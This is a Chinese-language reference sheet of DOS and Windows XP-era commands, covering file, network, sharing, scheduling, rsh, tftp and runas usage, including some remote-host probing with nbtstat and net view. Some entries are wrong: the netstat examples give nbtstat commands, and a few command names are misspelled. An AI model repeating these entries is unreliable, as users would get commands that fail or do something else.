摘要:[System]常用命令備忘
DOS 常用命令:
dir 列文件名 deltree 删除目录树 cls 清屏 cd 改变当前目录
copy 拷贝文件 diskcopy 复制磁盘 del 删除文件 format 格式化磁盘
edit 文本编辑 mem 查看内存状况 md 建立子目录 move 移动文件、改目录名
more 分屏显示 type 显示文件内容 rd 删除目录 sys 制作DOS系统盘
ren 改变文件名 xcopy 拷贝目录与文件 chkdsk 检查磁盘 attrib 设置文件属性
fdisk 硬盘分区 date 显示及修改日期 label 设置卷标号 defrag 磁盘碎片整理
msd 系统检测 path 设置搜寻目录 share 文件共享 memmaker内存优化管理
help 帮助 restore 恢复备份文件 set 设置环境变量 time 显示及修改时间
tree 列目录树 debug 随机调试程序 doskey 重新调用DOS命令 prempt 设置提示符 undelete恢复被删的文件 scandisk检测、修理磁盘
不常用DOS命令
diskcomp磁盘比较 append 设置非执行文件路径
expand 还原DOS文件 fasthelp快速显示帮助信息
fc 文件比较 interink启动服务器
setver 设置版本 intersvr启动客户机
subst 路径替换 qbasic Basic集成环境
vsafe 防病毒 unformat恢复已格式化的磁盘
ver 显示DOS版本号 smartdrv设置磁盘加速器
vol 显示磁盘卷标号 lh 将程序装入高端内存
ctty 改变控制设备 emm386 扩展内存管理
常用命令具体介绍:
一、Dir
显示目录文件和子目录列表,呵呵,这个当然是人人要知道的。
可以使用通配符(? 和 *),?表通配一个字符,*表通配任意字符
*.后缀
指定要查看后缀的文件。 上面其实也可以为“ . 后缀”,例如dir *.exe 等于dir .exe
/p
每次显示一个列表屏幕。要查看下一屏,请按键盘上的任意键。
/w
以宽格式显示列表,在每一行上最多显示 5 个文件名或目录名。
/s
列出指定目录及所有子目录中出现的每个指定的文件名。比win环境下的查找快多了
dir *.* -> a.txt 把当前目录文件列表写入a.txt
dir *.* /s -> a.txt 把当前目录文件列表写入a.txt,包括子目录下文件。
二、Attrib
显示、设置或删除指派给文件或目录的只读、存档、系统以及隐藏属性。如果在不含参数的情况下使用,则 attrib 会显示当前目录中所有文件的属性。
+r
设置只读属性。
-r
清除只读属性。
+a
设置存档文件属性。
-a
清除存档文件属性。
+s
设置系统属性。
-s
清除系统属性。
+h
设置隐藏属性。
-h
清除隐藏属性。
三、Cls
清除显示在命令提示符窗口中的所有信息,并返回空窗口,即“清屏”
四、Exit
退出当前命令解释程序并返回到系统。
五、format
格式化
/q
执行快速格式化。删除以前已格式化卷的文件表和根目录,但不在扇区之间扫描损坏区域。使用 /q 命令行选项应该仅格式化以前已格式化的完好的卷。
六、Ipconfig
显示所有当前的 TCP/IP 网络配置值、刷新动态主机配置协议 (DHCP) 和域名系统 (DNS) 设置。使用不带参数的 ipconfig 可以显示所有适配器的 IP 地址、子网掩码、默认网关。
/all
显示所有适配器的完整 TCP/IP 配置信息。
ipconfig 等价于 winipcfg,后者在ME、98 和 95 上可用。尽管 Windows XP 没有提供象 winipcfg 命令一样的图形化界面,但可以使用“网络连接”查看和更新 IP 地址。要做到这一点,请打开 网络连接,右键单击某一网络连接,单击“状态”,然后单击“支持”选项卡。
该命令最适用于配置为自动获取 IP 地址的计算机。它使用户可以确定哪些 TCP/IP 配置值是由 DHCP、自动专用 IP 地址 (APIPA) 和其他配置配置的。
七、md
创建目录或子目录
八、Move
将一个或多个文件从一个目录移动到指定的目录。
九、Nbtstat
显示本地计算机和远程计算机的基于 TCP/IP (NetBT) 协议的 NetBIOS 统计资料、NetBIOS 名称表和 NetBIOS 名称缓存。Nbtstat 可以刷新 NetBIOS 名称缓存和注册的 Windows Internet 名称服务 (WINS) 名称。使用不带参数的 nbtstat 显示帮助。Nbtstat 命令行参数区分大小写。
-a remotename
显示远程计算机的 NetBIOS 名称表,其中,RemoteName 是远程计算机的 NetBIOS 计算机名称。
-A IPAddress
显示远程计算机的 NetBIOS 名称表,其名称由远程计算机的 IP 地址指定(以小数点分隔)。
十、Netstat
显示活动的 TCP 连接、计算机侦听的端口、以太网统计信息、IP 路由表、IPv4 统计信息(对于 IP、ICMP、TCP 和 UDP 协议)以及 IPv6 统计信息(对于 IPv6、ICMPv6、通过 IPv6 的 TCP 以及通过 IPv6 的 UDP 协议)。使用时如果不带参数,netstat 显示活动的 TCP 连接。
-a
显示所有活动的 TCP 连接以及计算机侦听的 TCP 和 UDP 端口。
十一、Ping
通过发送“网际消息控制协议 (ICMP)”回响请求消息来验证与另一台 TCP/IP 计算机的 IP 级连接。回响应答消息的接收情况将和往返过程的次数一起显示出来。Ping 是用于检测网络连接性、可到达性和名称解析的疑难问题的主要 TCP/IP 命令。如果不带参数,ping 将显示帮助。名称和Ip地址解析是它的最简单应用也是用的最多的。
-t
指定在中断前 ping 可以持续发送回响请求信息到目的地。要中断并显示统计信息,请按 CTRL-BREAK。要中断并退出 ping,请按 CTRL-C。
-lSize
指定发送的回响请求消息中“数据”字段的长度(以字节表示)。默认值为 32。size 的最大值是 65,527。
十二、Rename (Ren)
更改文件的名称。
例如 ren *.abc *.cba
十三、Set
显示、设置或删除环境变量。如果没有任何参数,set 命令将显示当前环境设置。
十四、Shutdown
允许您关闭或重新启动本地或远程计算机。如果没有使用参数,shutdown 将注销当前用户。
-m ComputerName
指定要关闭的计算机。
-t xx
将用于系统关闭的定时器设置为 xx 秒。默认值是 20 秒。
-l
注销当前用户,这是默认设置。-m ComputerName 优先。
-s
关闭本地计算机。
-r
关闭之后重新启动。
-a
中止关闭。除了 -l 和 ComputerName 外,系统将忽略其它参数。在超时期间,您只可以使用 -a。
十五、System File Checker (sfc)
win下才有,在重新启动计算机后扫描和验证所有受保护的系统文件。
/scannow
立即扫描所有受保护的系统文件。
/scanonce
一次扫描所有受保护的系统文件。
/purgecache
立即清除“Windows 文件保护”文件高速缓存,并扫描所有受保护的系统文件。
/cachesize=x
设置“Windows 文件保护”文件高速缓存的大小,以 MB 为单位。
十六、type
显示文本文件的内容。使用 type 命令查看文本文件或者是bat文件而不修改文件
十七、Tree
图像化显示路径或驱动器中磁盘的目录结构。
十八、Xcopy
复制文件和目录,包括子目录。
/s
复制非空的目录和子目录。如果省略 /s,xcopy 将在一个目录中工作。
/e
复制所有子目录,包括空目录。
十九、copy
将一个或多个文件从一个位置复制到其他位置
二十、del
删除指定文件。
ftp和bat批命令和net和telnet由于子命令太多,这里不说了,不过这几个都是常用到的。
网络常用命令:
1.最基本,最常用的,测试物理网络的
ping 192.168.10.88 -t ,参数-t是等待用户去中断测试
2.查看DNS、IP、Mac等
A.Win98:winipcfg
B.Win2000以上:Ipconfig/all
C.NSLOOKUP:如查看河北的DNS
C:\>nslookup
Default Server: ns.hesjptt.net.cn
Address: 202.99.160.68
>server 202.99.41.2 则将DNS改为了41.2
> pop.pcpop.com
Server: ns.hesjptt.net.cn
Address: 202.99.160.68
Non-authoritative answer:
Name: pop.pcpop.com
Address: 202.99.160.212
3.网络信使
Net send 计算机名/IP|* (广播) 传送内容,注意不能跨网段
net stop messenger 停止信使服务,也可以在面板-服务修改
net start messenger 开始信使服务
4.探测对方对方计算机名,所在的组、域及当前用户名
ping -a IP -t ,只显示NetBios名
nbtstat -a 192.168.10.146 比较全的
5.netstat -a 显示出你的计算机当前所开放的所有端口
netstat -s -e 比较详细的显示你的网络资料,包括TCP、UDP、ICMP 和 IP的统计等
6.探测arp绑定(动态和静态)列表,显示所有连接了我的计算机,显示对方IP和MAC地址
arp -a
7.在代理服务器端
捆绑IP和MAC地址,解决局域网内盗用IP:
ARP -s 192.168.10.59 00-50-ff-6c-08-75
解除网卡的IP与MAC地址的绑定:
arp -d 网卡IP
8.在网络邻居上隐藏你的计算机
net config server /hidden:yes
net config server /hidden:no 则为开启
9.几个net命令
A.显示当前工作组服务器列表 net view,当不带选项使用本命令时,它就会显示当前域或网络上的计算机上的列表。
比如:查看这个IP上的共享资源,就可以
C:\>net view 192.168.10.8
在 192.168.10.8 的共享资源
资源共享名 类型 用途 注释
--------------------------------------
网站服务 Disk
命令成功完成。
B.查看计算机上的用户帐号列表 net user
C.查看网络链接 net use
例如:net use z: \\192.168.10.8\movie 将这个IP的movie共享目录映射为本地的Z盘
D.记录链接 net session
例如:
C:\>net session
计算机 用户名 客户类型 打开空闲时间
-------------------------------------------------------------------------------
\\192.168.10.110 ROME Windows 2000 2195 0 00:03:12
\\192.168.10.51 ROME Windows 2000 2195 0 00:00:39
命令成功完成。
10.路由跟踪命令
A.tracert pop.pcpop.com
B.pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的%
11.关于共享安全的几个命令
A.查看你机器的共享资源 net share
B.手工删除共享
net share c$ /d
net share d$ /d
net share ipc$ /d
net share admin$ /d
注意$后有空格。
C.增加一个共享:
c:\net share mymovie=e:\downloads\movie /users:1
mymovie 共享成功。
同时限制链接用户数为1人。
12.在DOS行下设置静态IP
A.设置静态IP
CMD
netsh
netsh>int
interface>ip
interface ip>set add "本地链接" static IP地址 mask gateway
B.查看IP设置
interface ip>show address
Arp
显示和修改"地址解析协议 (ARP)"缓存中的项目。ARP 缓存中包含一个或多个表,它们用于存储 IP 地址及其经过解析的以太网或令牌环物理地址。计算机上安装的每一个以太网或令牌环网络适配器都有自己单独的表。如果在没有参数的情况下使用,则 arp 命令将显示帮助信息。
语法
arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [-d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]]
参数
-a [InetAddr] [-N IfaceAddr]
显示所有接口的当前 ARP 缓存表。要显示指定 IP 地址的 ARP 缓存项,请使用带有 InetAddr 参数的 arp -a,此处的 InetAddr 代表指定的 IP 地址。要显示指定接口的 ARP 缓存表,请使用 -N IfaceAddr 参数,此处的 IfaceAddr 代表分配给指定接口的 IP 地址。-N 参数区分大小写。
-g [InetAddr] [-N IfaceAddr]
与 -a 相同。
-d InetAddr [IfaceAddr]
删除指定的 IP 地址项,此处的 InetAddr 代表 IP 地址。对于指定的接口,要删除表中的某项,请使用 IfaceAddr 参数,此处的 IfaceAddr 代表分配给该接口的 IP 地址。要删除所有项,请使用星号 (*) 通配符代替 InetAddr。
-s InetAddr EtherAddr [IfaceAddr]
向 ARP 缓存添加可将 IP 地址 InetAddr 解析成物理地址 EtherAddr 的静态项。要向指定接口的表添加静态 ARP 缓存项,请使用 IfaceAddr 参数,此处的 IfaceAddr 代表分配给该接口的 IP 地址。
/?
在命令提示符显示帮助。
注释
InetAddr 和 IfaceAddr 的 IP 地址用带圆点的十进制记数法表示。
物理地址 EtherAddr 由六个字节组成,这些字节用十六进制记数法表示并且用连字符隔开(比如,00-AA-00-4F-2A-9C)。
通过 -s 参数添加的项属于静态项,它们不会 ARP 缓存中超时。如果终止 TCP/IP 协议后再启动,这些项会被删除。要创建永久的静态 ARP 缓存项,请在批处理文件中使用适当的 arp 命令并通过"计划任务程序"在启动时运行该批处理文件。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要显示所有接口的 ARP 缓存表,可键入:
arp -a
对于指派的 IP 地址为 10.0.0.99 的接口,要显示其 ARP 缓存表,可键入:
arp -a -N 10.0.0.99
要添加将 IP 地址 10.0.0.80 解析成物理地址 00-AA-00-4F-2A-9C 的静态 ARP 缓存项,可键入: arp -s 10.0.0.80 00-AA-00-4F-2A-9C
13.At
计划在指定时间和日期在计算机上运行命令和程序。at 命令只能在"计划"服务运行时使用。如果在没有参数的情况下使用,则 at 列出已计划的命令。
语法
at [\\ComputerName] [{[ID] [/delete]|/delete [/yes]}]
at [[\\ComputerName] hours:minutes [/interactive] [{/every:date[,...]|/next:date[,...]}] command]
参数
\\computername
指定远程计算机。如果省略该参数,则 at 计划本地计算机上的命令和程序。
ID
指定指派给已计划命令的识别码。
/delete
取消已计划的命令。如果省略了 ID,则计算机中所有已计划的命令将被取消。
/yes
删除已计划的事件时,对来自系统的所有询问都回答"是"。
hours:minutes
指定命令运行的时间。该时间用 24 小时制(即从 00:00 [午夜] 到 23:59)的 小时: 分钟格式表示。
/interactive
对于在运行 command 时登录的用户,允许 command 与该用户的桌面进行交互。
/every:
在每个星期或月的指定日期(例如,每个星期四,或每月的第三天)运行 command 命令。
date
指定运行命令的日期。可以指定一周的某日或多日(即,键入 M、T、W、Th、F、S、Su)或一个月中的某日或多日(即,键入从 1 到31 之间的数字)。用逗号分隔多个日期项。如果省略了 date,则 at 使用该月的当前日。
/next:
在下一个指定日期(比如,下一个星期四)到来时运行 command。
command
指定要运行的 Windows 命令、程序(.exe 或 .com 文件)或批处理程序(.bat 或 .cmd 文件)。当命令需要路径作为参数时,请使用绝对路径,也就是从驱动器号开始的整个路径。如果命令在远程计算机上,请指定服务器和共享名的通用命名协定 (UNC) 符号,而不是远程驱动器号。
/?
在命令提示符显示帮助。
注释
Schtasks 是功能更为强大的超集命令行计划工具,它含有 at 命令行工具中的所有功能。对于所有的命令行计划任务,都可以使用 schtasks 来替代 at。有关 schtasks 的详细信息,请参阅"相关主题"。
使用 at
使用 at 命令时,要求您必须是本地 Administrators 组的成员。
加载 Cmd.exe
在运行命令之前,At 不会自动加载 Cmd.exe (命令解释器)。如果没有运行可执行文件 (.exe),则在命令开头必须使用如下所示的方法专门加载 Cmd.exe:
cmd /c dir > c:\test.out。
查看已计划的命令
当不带命令行选项使用 at 时,计划任务会出现在类似于以下格式的表中:
Status ID Day Time Command Line
OK 1 Each F 4:30 PM net send group leads status due
OK 2 Each M 12:00 AM chkstor > check.file
OK 3 Each F 11:59 PM backup2.bat
包含标识号 (ID)
当在命令提示下使用带有标识号 (ID) 的 at 命令时,单个任务项的信息会显示在类似于下面的格式中:
Task ID: 1
Status:OK
Schedule:Each F
Time of Day:4:30 PM
Command:net send group leads status due当计划带有 at 的命令(尤其是带有命令行选项的命令)后,要通过键入不带命令行选项的 at 来检查该命令语法是否输入正确。如果显示在"命令行"列中的信息不正确,请删除该命令,然后重新键入它。如果还不正确,则可以在重新键入该命令时让它少带些命令行选项。 查看结果
使用 at 的已经计划的命令作为后台程序运行。运行结果不会显示在计算机上。要将输出重定向到文件,请使用重定向符号 (>)。如果将输出重定向到文件,则不论是在命令行还是在批处理文件中使用 at,都需要在重定向符号之前使用转义符 (^)。例如,要重定向输出到 Output.text 文件,则要键入:
at 14:45 c:\test.bat ^>c:\output.txt
执行命令的当前目录为 systemroot 文件夹。
更改系统时间
在使用 at 命令计划了要运行的命令之后,如果更改了计算机的系统时间,则通过键入不带命令行选项的 at 可使 at 计划程序与修改后的系统时间同步。
存储命令
已计划的命令存储在注册表中。这样,如果重新启动"计划"服务,则不会丢失计划任务。
连接到网络驱动器
对于需要访问网络的计划作业,请不要使用已重新定向的驱动器。"计划"服务可能无法访问这些重定向的驱动器,或者,在该计划任务运行时如果有其他用户登录,则这些重定向的驱动器可能不会出现。因此,对于计划作业,请使用 UNC 路径。例如:
at 1:00pm my_backup \\server\share
请不要使用下述语法(其中 x: ?表示由用户建立的连接):
at 1:00pm my_backup x:
如果计划了一个使用驱动器号的 at 命令来连接共享目录,则应包含一个 at 命令以使在完成该驱动器的使用时断开与驱动器的连接。如果不能断开与驱动器的连接,则在命令提示下,所指派的驱动器号将不可用。
范例
要显示 Marketing 服务器上已计划的命令列表,请键入:
at \\marketing
要了解服务器 Corp 上标识号为 3 的命令的详细信息,请键入:
at \\corp 3
要计划在上午 8:00 于 Corp 服务器上运行网络共享命令,并将该列表重定向到 Maintenance 服务器的 Corp.txt 文件(位于 Reports 共享目录下)中,请键入:
at \\corp 08:00 cmd /c "net share reports=d:\marketing\reports >> \\maintenance\reports\corp.txt"
为了在每五天后的午夜将 Marketing 服务器的硬盘驱动器备份到磁带驱动器,首先创建名为 Archive.cmd 的批处理程序(它含有备份命令),然后计划该批处理程序的运行,为此请键入:
at \\marketing 00:00 /every:5,10,15,20,25,30 archive
要取消当前服务器上已计划的所有命令,请按下述方法清除 at 计划信息:
at /delete
如果要运行的命令不是可执行 (.exe) 文件,请按如下所示的方法在该命令之前使用 cmd /c 来加载 Cmd.exe:
cmd /c dir > c:\test.out。
14.Rsh
在运行 RSH 服务的远程计算机上运行命令。Windows XP 和 Windows 2000 不提供 RSH 服务。Windows 2000 Server Resource Kit 提供名为 Rshsvc.exe 的 RSH 服务。使用不带参数的 rsh 显示帮助。
语法
rsh [Host] [-l UserName] [-n] [Command]
参数
Host
指定运行 command 的远程计算机。
-l UserName
指定远程计算机上使用的用户名。在省略情况下,使用当前登录用户的名称。
-n
将 rsh 的输入重定向到 NULL 设备。这防止本地计算机命令结果的显示。
Command
指定要运行的命令。
/?
在命令提示符显示帮助。
注释
标准操作
rsh 命令将标准输入复制到远程 command,将远程 command 的标准输出复制到其标准输出,将远程 command 的标准错误复制到其标准错误。Rsh 通常在远程命令终止时终止。
使用重定向符号
为了使重定向在远程计算机上发生,要以引号引住重定向符号(例如 ">>")。如果不使用引号,重定向会在本地计算机发生。例如,以下命令将远程文件"RemoteFile"附加到本地文件"LocalFile"中:
rsh othercomputer cat remotefile >> localfile
以下命令将远程文件 Remotefile 附加到远程文件 otherremotefile 中:
rsh othercomputer cat remotefile ">>" otherremotefile
使用 rsh
在使用已登录到某个域并且运行 Windows XP Professional 的计算机时,该域的主域控制器必须可用于确认用户名或 rsh 命令失败。
.rhosts 文件
.rhosts 文件通常许可 UNIX 系统的网络访问权限。.rhosts 文件列出可以访问远程计算机的计算机名及关联的登录名。在正确配置了 .rhosts 文件的远程计算机上运行 rcp、rexec 或 rsh 命令时,您不必提供远程计算机的登录和密码信息。
.rhosts 文件是一个文本文件,该文件中每一行为一个条目。条目由本地计算机名、本地用户名和有关该条目的所有注释组成。每个条目均由制表符或空格分开,注释用符号 (#) 打头。例如:
host7 #This computer is in room 31A
.rhosts 文件必须在远程计算机的用户主目录中。有关远程计算机 .rhosts 文件特定执行的详细信息,请参阅远程系统的文档。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要以名称 admin1 在远程计算机 vax1 上执行 telcon 命令,请键入:
rsh vax1 -l admin1 telcon
15.Tftp
向运行平凡文件传输协议 (TFTP) 服务或 daemon 的远程计算机(尤其是运行 UNIX 的计算机)传输文件或从运行平凡文件传输协议 (TFTP) 服务或 daemon 的远程计算机(尤其是运行 UNIX 的计算机)传输文件。
语法
tftp [-i] [Host] [{get | put}] [Source] [Destination]
参数
-i
指定二进制图像传送模式(也称为八进制模式)。在二进制图像模式下,文件以一个字节为单位进行传输。在传送二进制文件时使用该模式。如果省略了 -i,文件将以 ASCII 模式传送。这是默认的传送模式。该模式将行尾 (EOL) 字符转换为指定计算机的适当格式。传送文本文件时使用该模式。如果文件传送成功,将显示数据传输率。
Host
指定本地或远程计算机。
put
将本地计算机上的 Destination 文件传送到远程计算机上的 Source 文件。因为 TFTP 协议不支持用户身份验证,所以用户必须登录到远程计算机,同时文件在远程计算机上必须可写。
get
将远程计算机上的 Destination 文件传送到本地计算机上的 Source 文件。
Source
指定要传送的文件。
Destination
指定将文件传送到的位置。如果省略了 Destination,将假定它与 Source 同名。
/?
在命令提示符显示帮助。
注释
使用 get 参数
如果将本地计算机上的文件 FileTwo 传送到远程计算机上的文件 FileOne,则指定 put。如果将远程计算机上的文件 FileTwo 传送到远程计算机上的文件 FileOne,则指定 get。
Windows XP 或 Windows 2000 不提供一般用途的 TFTP 服务器。Windows 2000 提供的 TFTP 服务器服务只为 Windows XP 和 Windows 2000 客户端计算机提供远程引导功能。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要从本地计算机将文件 Users.txt 传送到远程计算机 vax1 上的 Users19.txt,请键入:
tftp vax1 put users.txt users19.txt
16.Nbtstat
显示本地计算机和远程计算机的基于 TCP/IP (NetBT) 协议的 NetBIOS 统计资料、NetBIOS 名称表和 NetBIOS 名称缓存。Nbtstat 可以刷新 NetBIOS 名称缓存和注册的 Windows Internet 名称服务 (WINS) 名称。使用不带参数的 nbtstat 显示帮助。
语法
nbtstat [-a RemoteName] [-A IPAddress] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [Interval]
参数
-a remotename
显示远程计算机的 NetBIOS 名称表,其中,RemoteName 是远程计算机的 NetBIOS 计算机名称。NetBIOS 名称表是运行在该计算机上的应用程序使用的 NetBIOS 名称列表。
-A IPAddress
显示远程计算机的 NetBIOS 名称表,其名称由远程计算机的 IP 地址指定(以小数点分隔)。
-c
显示 NetBIOS 名称缓存内容、NetBIOS 名称表及其解析的各个地址。
-n
显示本地计算机的 NetBIOS 名称表。Registered 中的状态表明该名称是通过广播或 WINS 服务器注册的。
-r
显示 NetBIOS 名称解析统计资料。在配置为使用 WINS 的 Windows XP 计算机上,该参数将返回已通过广播和 WINS 解析和注册的名称号码。
-R
清除 NetBIOS 名称缓存的内容并从 Lmhosts 文件中重新加载带有 #PRE 标记的项目。
-RR
重新释放并刷新通过 WINS 注册的本地计算机的 NetBIOS 名称。
-s
显示 NetBIOS 客户和服务器会话,并试图将目标 IP 地址转化为名称。
-S
显示 NetBIOS 客户和服务器会话,只通过 IP 地址列出远程计算机。
Interval
重新显示选择的统计资料,可以中断每个显示之间的 Interval 中指定的秒数。按 CTRL+C 停止重新显示统计信息。如果省略该参数, netstat 将只显示一次当前的配置信息。
/?
在命令提示符显示帮助。
注释
Nbtstat 命令行参数区分大小写。
下表列出了由 Nbtstat 生成的列标题。 标题 说明
Input 接收的字节数。
Output 发送的字节数。
In/Out 该连接是否从计算机(传出)或者其他计算机到本地计算机(传入)。
Lift 名称表缓存项在被清除之前所存留的时间。
Local Name 本地 NetBIOS 名称与连接相关联。
Remote Host 与远程计算机相关的名称或 IP 地址。
<03> 转化为十六进制的 NetBIOS 名称的最后一个字节。每个 NetBIOS 名称长度均为 16 个字符。由于最后一个字节通常有特殊的意义,因为相同的名称(只有最后一个字节不同)可能在一台计算机上出现几次。例如,<20> 在 ASCII 文本中是一个空格。
Type 名称类型。名称可以是单个名称,也可以是组名称。
Status 远程计算机上是否在运行 NetBIOS 服务("已注册"),或同一计算机名是否已注册了相同的服务("冲突")。
State NetBIOS 连接的状态。
下表列出了可能的 NetBIOS 连接状态。 状态 说明
已连接 会话已建立。
关联 连接的终结点已经被创建并与 IP 地址关联。
正接听 该终结点对内向连接可用。
空闲 该结束点已被打开单不能接收连接。
正在连接 会话处于连接阶段。在此阶段正在解析所选目标的由名称到 IP 地址的映射。
接受 入站会话当前正在被接受,将在短期内连接。
重新连接 会话将试图重新连接(如果第一次连接失败)。
出站 会话正处于连接阶段。此阶段正在创建 TCP 连接。
入站 入站会话在连接期。
正在断开 会话正在断开连接。
已中断连接 本地计算机已断开连接,并正等待远程系统的确认。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要显示 NetBIOS 计算机名为 CORP07 的远程计算机的 NetBIOS 名称表,请键入:
nbtstat -a CORP07
要显示所分配 IP 地址为 10.0.0.99 的远程计算机的 NetBIOS 名称表,请键入:
nbtstat -A 10.0.0.99
要显示本地计算机的 NetBIOS 名称表,请键入:
nbtstat -n
要显示本地计算机 NetBIOS 名称缓存的内容,请键入:
nbtstat -c
要清除 NetBIOS 名称缓存并重新装载本地 Lmhosts 文件中带标记 #PRE 的项目,请键入:
nbtstat -R
要释放通过 WINS 服务器注册的 NetBIOS 名称并对其重新注册,请键入:
nbtstat -RR
要每隔 5 秒以 IP 地址显示 NetBIOS 会话统计资料,请键入:
nbtstat -S 5
17.Netstat
显示活动的 TCP 连接、计算机侦听的端口、以太网统计信息、IP 路由表、IPv4 统计信息(对于 IP、ICMP、TCP 和 UDP 协议)以及 IPv6 统计信息(对于 IPv6、ICMPv6、通过 IPv6 的 TCP 以及通过 IPv6 的 UDP 协议)。使用时如果不带参数,netstat 显示活动的 TCP 连接。
语法
netstat [-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval]
参数
-a
显示所有活动的 TCP 连接以及计算机侦听的 TCP 和 UDP 端口。
-e
显示以太网统计信息,如发送和接收的字节数、数据包数。该参数可以与 -s 结合使用。
-n
显示活动的 TCP 连接,不过,只以数字形式表现地址和端口号,却不尝试确定名称。
-o
显示活动的 TCP 连接并包括每个连接的进程 ID (PID)。可以在 Windows 任务管理器中的"进程"选项卡上找到基于 PID 的应用程序。该参数可以与 -a、-n 和 -p 结合使用。
-p Protocol
显示 Protocol 所指定的协议的连接。在这种情况下,Protocol 可以是 tcp、udp、tcpv6 或 udpv6。如果该参数与 -s 一起使用按协议显示统计信息,则 Protocol 可以是 tcp、udp、icmp、ip、tcpv6、udpv6、icmpv6 或 ipv6。
-s
按协议显示统计信息。默认情况下,显示 TCP、UDP、ICMP 和 IP 协议的统计信息。如果安装了 Windows XP 的 IPv6 协议,就会显示有关 IPv6 上的 TCP、IPv6 上的 UDP、ICMPv6 和 IPv6 协议的统计信息。可以使用 -p 参数指定协议集。
-r
显示 IP 路由表的内容。该参数与 route print 命令等价。
Interval
每隔 Interval 秒重新显示一次选定的信息。按 CTRL+C 停止重新显示统计信息。如果省略该参数,netstat 将只打印一次选定的信息。
/?
在命令提示符显示帮助。
注释
与该命令一起使用的参数必须以连字符 (-) 而不是以短斜线 (/) 作为前缀。
Netstat 提供下列统计信息:
Proto
协议的名称(TCP 或 UDP)。
Local Address
本地计算机的 IP 地址和正在使用的端口号。如果不指定 -n 参数,就显示与 IP 地址和端口的名称对应的本地计算机名称。如果端口尚未建立,端口以星号(*)显示。
Foreign Address
连接该插槽的远程计算机的 IP 地址和端口号码。如果不指定 -n 参数,就显示与 IP 地址和端口对应的名称。如果端口尚未建立,端口以星号(*)显示。
(state)
表明 TCP 连接的状态。可能的状态如下:
CLOSE_WAIT
CLOSED
ESTABLISHED
FIN_WAIT_1
FIN_WAIT_2
LAST_ACK
LISTEN
SYN_RECEIVED
SYN_SEND
TIMED_WAIT
有关 TCP 连接状态的信息,请参阅 RFC 793。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要想显示以太网统计信息和所有协议的统计信息,请键入下列命令:
netstat -e -s
要想仅显示 TCP 和 UDP 协议的统计信息,请键入下列命令:
netstat -s -p tcp udp
要想每 5 秒钟显示一次活动的 TCP 连接和进程 ID,请键入下列命令:
nbtstat -o 5
要想以数字形式显示活动的 TCP 连接和进程 ID,请键入下列命令:
nbtstat -n -o
18.Runas
允许用户用其他权限运行指定的工具和程序,而不是用户当前登录提供的权限。
语法
runas [{/profile|/noprofile}] [/env] [/netonly] [/smartcard] [/showtrustlevels] [/trustlevel] /user:UserAccountName program
参数
/profile
加载用户的配置文件。/profile 是默认值。
/no profile
/noprofile 指定不加载用户的配置文件。这使应用程序载入的更加快速,但是在一些应用程序中也会引起错误。
/env
指定当前使用的网络环境,而不是用户的本地环境。
/netonly
指明指定的用户信息只用于远程访问。
/smartcard
/smartcard 表示凭据是否是由智能卡提供的。
/showtrustlevels
列出 /trustlevel 开关项。
/trustlevel
指定应用程序运行所在的授权级别。使用 /showtrustlevels 查看可用的信任级别。
/user:UserAccountName
指定在其下运行程序的用户帐户的名称。用户帐户的格式应是 user@domain 或 domain\user。
程序
指定要用在 /user 中指定的帐户运行的程序或命令。
/?
在命令提示符显示帮助。
注释
管理员可以使用一个权限受限制的帐户执行日常、非管理性的任务,只有在执行特定管理任务时,才使用一个权限更大的帐户。要不经过注销再重新登录就完成这样的任务,可以用一般帐户登录,然后使用 runas 命令来运行需要更大权限的工具。
有关 runas 命令的使用范例,请参阅"相关主题"。
尽管 runas 通常由 Administrator 帐户使用,但并非仅限于 Administrator 帐户。任何拥有多个帐户的用户均可以利用备用凭据,使用 runas 运行程序、MMC 控制台或"控制面板"项。
如果要在计算机上使用 Administrator 帐户,对于 /user:,键入下列参数之一:
/user:AdministratorAccountName@ComputerName
/user:ComputerName\AdministratorAccountName
如果想以域管理员身份使用这个命令,键入下列参数之一:
/user:AdministratorAccountName@DomainName
/user:DomainName\AdministratorAccountName
runas 命令允许您运行程序 (*.exe)、保存的 MMC 控制台 (*.msc)、程序和保存的 MMC 控制台的快捷方式及"控制面板"项。作为另一组(例如"Users"或"Power Users"组)的成员登录到计算机时,可以以管理员的身份运行。
可以使用 runas 命令来启动任何程序、MMC 控制器或"控制面板"项。只要提供适当的用户帐户和密码信息,用户帐户就具有登录到计算机的能力,并且程序、MMC 控制台、"控制面板"项在系统中及对该用户帐户均可用.
runas 命令允许您管理其他域的服务器(运行工具的计算机和要管理的服务器在不同的域中)。
如果尝试使用 runas 从网络位置启动程序、MMC 控制台或"控制面板"项,可能会因为用来连接网络共享的凭据与用来启动程序的凭据不同而失败。后者的凭据可能无法访问同一网络共享。
有些项,例如"打印机"文件夹和桌面项,间接由 Windows 2000 打开,而不能使用 runas 命令启动。
如果 runas 命令失败,则可能是没有运行 RunAs 服务或使用的用户帐户无效。要检查 RunAs 服务的状态,请在"计算机管理"中单击"服务和应用程序",然后单击"服务"。要测试用户帐户,请尝试使用该帐户登录合适的域。
范例
要在本地计算机上以管理员身份启动 Windows 2000 命令提示行实例,请键入:
runas /user:localmachinename\administrator cmd
系统提示时,键入管理员密码。
要使用名为 companydomain\domainadmin 的域管理员帐户启动"计算机管理"管理单元实例,请键入: runas /user:companydomain\domainadmin "mmc %windir%\system32\compmgmt.msc"
当提示时,键入帐户密码。
要使用名为 domain.microsoft.com 的域中的域管理员帐户 user 启动"记事本"实例,请键入:
runas /user:user@domain.microsoft.com "notepad my_file.txt"
当提示时,键入帐户密码。
要启动命令提示符行窗口、保存的 MMC 控制台、控制面板项或管理其他地点服务器的程序的一个实例,请键入:
runas /netonly /user:domain\username "command"
domain\username 必须是有足够权限管理服务器的用户。当提示时,键入帐户密码。
19.Route
